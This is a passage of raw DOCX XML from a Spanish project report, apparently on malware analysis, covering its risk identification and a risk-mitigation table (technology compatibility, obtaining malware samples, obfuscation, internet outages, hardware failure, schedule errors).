          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>medidas de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mitigación en el caso de que estos riesgos se manifiesten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934C2E0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="009B4B38">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc107862694"/>
      <w:bookmarkStart w:id="49" w:name="_Toc170500163"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.4.1   Identificación de riesgos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="67311DA0" w14:textId="77777777" w:rsidR="00000A6F" w:rsidRDefault="00000A6F" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7234D7A5" w14:textId="14027D6A" w:rsidR="00D02407" w:rsidRDefault="009E0A7B" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">De acuerdo </w:t>
      </w:r>
      <w:r w:rsidR="00000A6F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la Guía de los fundamentos para la dirección de proyectos, conocida como PMBOK [X], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">los riesgos que se pueden presentar en el proyecto se </w:t>
      </w:r>
      <w:r w:rsidR="003C0131">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dividen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cuatro categorías diferentes en función de su naturaleza</w:t>
      </w:r>
      <w:r w:rsidR="0002586C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Teniendo en cuenta esta división en categorías</w:t>
      </w:r>
      <w:r w:rsidR="00D02407">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, se han identificado los siguientes riesgos asociados con cada una de </w:t>
      </w:r>
      <w:r w:rsidR="0002586C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ellas</w:t>
      </w:r>
      <w:r w:rsidR="00D02407">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BA8AA" w14:textId="77777777" w:rsidR="00675C05" w:rsidRDefault="00D02407" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos técnicos: </w:t>
      </w:r>
      <w:r w:rsidR="0002586C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">son aquellos que hacen referencia a las tecnologías de las que hace uso el proyecto, la calidad de este o la complejidad de las tareas a realizar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE96C0A" w14:textId="0D566E2A"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 xml:space="preserve">problemas de compatibilidad con las tecnologías a utilizar, </w:t>
      </w:r>
      <w:r w:rsidR="007E795D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">complicaciones para la obtención de muestras de malware que cumplan las características deseadas, </w:t>
      </w:r>
      <w:r w:rsidR="00D02407">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dificultades a la hora de realizar los análisis planificados debido a problemas con las tareas necesarias (código encriptado, ofuscación difícil de revertir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
      <w:r w:rsidR="00D02407">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBF665" w14:textId="77777777" w:rsidR="00675C05" w:rsidRDefault="00D02407" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos externos: </w:t>
      </w:r>
      <w:r w:rsidR="00675C05">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>relacionados con agentes externos al proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D154494" w14:textId="0DCF206D" w:rsidR="00D02407" w:rsidRDefault="00675C05" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos aplicables al proyecto: </w:t>
      </w:r>
      <w:r w:rsidR="00D02407">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>problemas de acceso a Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66473103" w14:textId="77777777" w:rsidR="00EC50C8" w:rsidRDefault="00D02407" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos de la organización: </w:t>
      </w:r>
      <w:r w:rsidR="00EC50C8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">aquellos que engloban a los recursos del proyecto o su financiación. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E05EC" w14:textId="4EAC0595" w:rsidR="00D02407" w:rsidRDefault="00EC50C8" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos aplicables al proyecto: </w:t>
      </w:r>
      <w:r w:rsidR="000D3727">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fallo de hardware del equipo que se utilizará para el análisis</w:t>
      </w:r>
      <w:r w:rsidR="00F661AB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:r w:rsidR="00D30644">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>provoquen su indisponibilidad para realizar las tareas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26582A5B" w14:textId="77777777" w:rsidR="00D30644" w:rsidRDefault="000D3727" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos de la dirección de proyectos: </w:t>
      </w:r>
      <w:r w:rsidR="00D30644">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">referentes a la gestión del proyecto desde el punto de vista de las tareas a realizar, sus plazos de duración y las dependencias entre estos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC126C" w14:textId="7C2E281B" w:rsidR="000D3727" w:rsidRPr="009E0A7B" w:rsidRDefault="00D30644" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Riesgos aplicables al proyecto: </w:t>
      </w:r>
      <w:r w:rsidR="000D3727">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>estimaciones erróneas de la duración de las tareas y fallos de planificación que provoquen alteraciones en las fechas propuestas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28250955" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE3C252" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc107862695"/>
      <w:bookmarkStart w:id="51" w:name="_Toc170500164"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.4.2   Análisis de riesgos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="258A5F3D" w14:textId="77777777" w:rsidR="0002586C" w:rsidRDefault="0002586C" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333EAB75" w14:textId="753DF2AC" w:rsidR="0002586C" w:rsidRDefault="0002586C" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dados los riesgos identificados, se procede a proponer una serie de medidas para tratar de solventar los problemas que causen en el caso de que ocurran</w:t>
      </w:r>
      <w:r w:rsidR="00654206">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, presentadas en la tabla a continuación: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2F0AB4" w14:paraId="7C497E7A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7776F02F" w14:textId="33D87148" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Categoría</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E92819" w14:textId="7F523BBC" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B405A6" w14:textId="779FDC09" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Medidas </w:t>
            </w:r>
            <w:r w:rsidR="003B41B0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>de subsanación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F0AB4" w14:paraId="2C930770" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8611F9" w14:textId="70FFF230" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgos técnicos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="746C3679" w14:textId="04412067" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Problemas de compatibilidad de tecnologías</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7672C8EC" w14:textId="581CCECE" w:rsidR="002F0AB4" w:rsidRDefault="00B9213D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Elección de tecnologías alternativas conocidas que pese a no ser idénticas obtengan resultados similares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2A15" w14:paraId="6F565C75" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA48F71" w14:textId="63F830F2" w:rsidR="00CA2A15" w:rsidRDefault="00CA2A15">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgos técnicos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="331FAE7B" w14:textId="54D284D4" w:rsidR="00CA2A15" w:rsidRDefault="00CA2A15">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Complicaciones para la obtención de muestras de malware que cumplan las características propuestas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617562A6" w14:textId="629AE372" w:rsidR="00CA2A15" w:rsidRDefault="00CA2A15">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Búsqueda en repositorios alternativos de malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F0AB4" w14:paraId="699CDB37" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F91175A" w14:textId="25C2A17F" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgos técnicos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C398BFF" w14:textId="291F8D9F" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Dificultades a la hora de realizar los análisis (ofuscación no reversible, datos encriptados, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66BC873B" w14:textId="47F67495" w:rsidR="002F0AB4" w:rsidRDefault="00B9213D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realización en paralelo de otros tipos de análisis para tratar de obtener más información sobre el malware que permita una solución alternativa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F0AB4" w14:paraId="5645A13E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4192C5B1" w14:textId="64CB1F49" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgos externos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36B6E2AE" w14:textId="7DAE4BE6" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Problemas de acceso a internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2122FCB6" w14:textId="547CF49C" w:rsidR="002F0AB4" w:rsidRDefault="00377852">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Utilización de proveedores de Internet alternativos como por ejemplo sistemas de Internet 4G que requieran de menor tiempo de instalación. En caso de situación crítica sin solución por parte del proveedor, se valoraría el cambio de ISP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F0AB4" w14:paraId="54ACF706" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48479A2B" w14:textId="74DC80E7" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Riesgos de la organización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF24ADE" w14:textId="0A1A9CCE" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fallo de hardware del equi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>po informático a utilizar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="532F3264" w14:textId="58F41943" w:rsidR="002F0AB4" w:rsidRDefault="00B9213D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Obtención de un dispositivo de reserva y realización de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>copias de seguridad de los materiales del proyecto, tanto en dispositivos físicos externos al equipo como en servicios de almacenamiento en la nube</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F0AB4" w14:paraId="56DC1BC9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A8D9313" w14:textId="19C8B2C3" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Riesgos de la dirección de proyectos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744FF6F9" w14:textId="31C79058" w:rsidR="002F0AB4" w:rsidRDefault="002F0AB4">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Estimaciones erróneas de la duración de las tareas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC29BB4" w14:textId="1805F003" w:rsidR="002F0AB4" w:rsidRDefault="000D00A9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Reajuste de los plazos de realización de las tareas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F5BB3CB" w14:textId="77777777" w:rsidR="00654206" w:rsidRDefault="00654206" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
